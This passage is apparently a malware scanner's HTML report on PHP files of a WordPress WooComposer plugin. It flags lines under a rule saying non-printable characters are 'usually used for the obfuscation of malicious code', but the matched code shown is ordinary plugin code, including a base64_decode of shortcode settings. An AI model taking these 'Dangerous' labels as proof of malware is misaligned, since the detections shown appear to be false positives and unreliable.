</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_391").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-single-style03.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.63 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_392" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_single_style03</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_392").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.00 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_393" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 145</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_strip_all_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_dls_01_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'shortcode'</span><span style="color: #007700">] ) ) ); </span><span style="color: #FF8000">//phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_loop_style01</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$element </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_393").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-loop-style04.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.08 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_394" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 143</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_strip_all_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_dls_04_settings</span><span style="color: #007700">[</span><span style="color: #DD0000">'shortcode'</span><span style="color: #007700">] ) ) ); </span><span style="color: #FF8000">//phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_loop_style04</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$element </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 413</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_394").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_product.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.27 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_395" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'woocomposer_single_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$product_style</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #0000BB">$function </span><span style="color: #007700">) ) { </span><span style="color: #0000BB">$output </span><span style="color: #007700">.= </span><span style="color: #0000BB">$function</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">); } } return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_WooComposer_ViewProduct</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs WooComposer view peoduct</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer InitProduct</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 31</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Init_Product</span><span style="color: #007700">() { </span><span style="color: #FF8000">/// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">WooComposer Product</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 389</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">WooComposer_Product</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) { </span><span style="color: #FF8000">// phpcs:ignore WordPress.NamingConventions.ValidFunctionName.MethodNameInvalid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 403</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'wc_print_notices' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function = </span><span style="color: #DD0000">'woocomposer_single_' </span><span style="color: #007700">. </span><span style="color: #0000BB">$product_style</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #0000BB">$function </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 416</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 419</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_395").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-single-style02.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.36 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_396" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_single_style02</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 239</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_396").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/woocomposer_pagination.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.58 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_397" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">(); }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_pagination</span><span style="color: #007700">( </span><span style="color: #0000BB">$pages </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$range </span><span style="color: #007700">= </span><span style="color: #0000BB">2 </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">ob_get_clean</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Info </span><span style="color: #007700">List </span><span style="color: #0000BB">Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_397").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/shortcode_list.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 14.59 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 13</span><br><table id="file_398" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_VC_Addons_WooComposer_ViewList</span><span style="color: #007700">(); } if ( </span><span style="color: #0000BB">class_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'WPBakeryShortCode' </span><span style="color: #007700">) ) { class </span><span style="color: #0000BB">WPBakeryShortCode_Woocomposer_List </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that initializes Ultimate_VC_Addons_WooComposer View </span><span style="color: #007700">List</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that constructs </span><span style="color: #007700">default </span><span style="color: #0000BB">values </span><span style="color: #007700">for </span><span style="color: #0000BB">the woocomposer init grid</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 191</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">woocomposer </span><span style="color: #007700">list </span><span style="color: #0000BB">shortcode</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_list_shortcode</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 22</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">( </span><span style="color: #0000BB">wp_strip_all_tags</span><span style="color: #007700">( </span><span style="color: #0000BB">$ult_woocomposer_list_shortcode</span><span style="color: #007700">[</span><span style="color: #DD0000">'shortcode'</span><span style="color: #007700">] ) ) ); </span><span style="color: #FF8000">//phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">Ultimate Info </span><span style="color: #007700">List </span><span style="color: #0000BB">Module</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">woocomposer_init_grid</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 33</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'vc_map' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 423</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Function </span><span style="color: #0000BB">that WPBakery shortCode woocomposer_list Module</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_398").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/Ultimate_VC_Addons/woocomposer/modules/design-single-style01.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.66 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2024-10-11 21:15:25</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_399" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
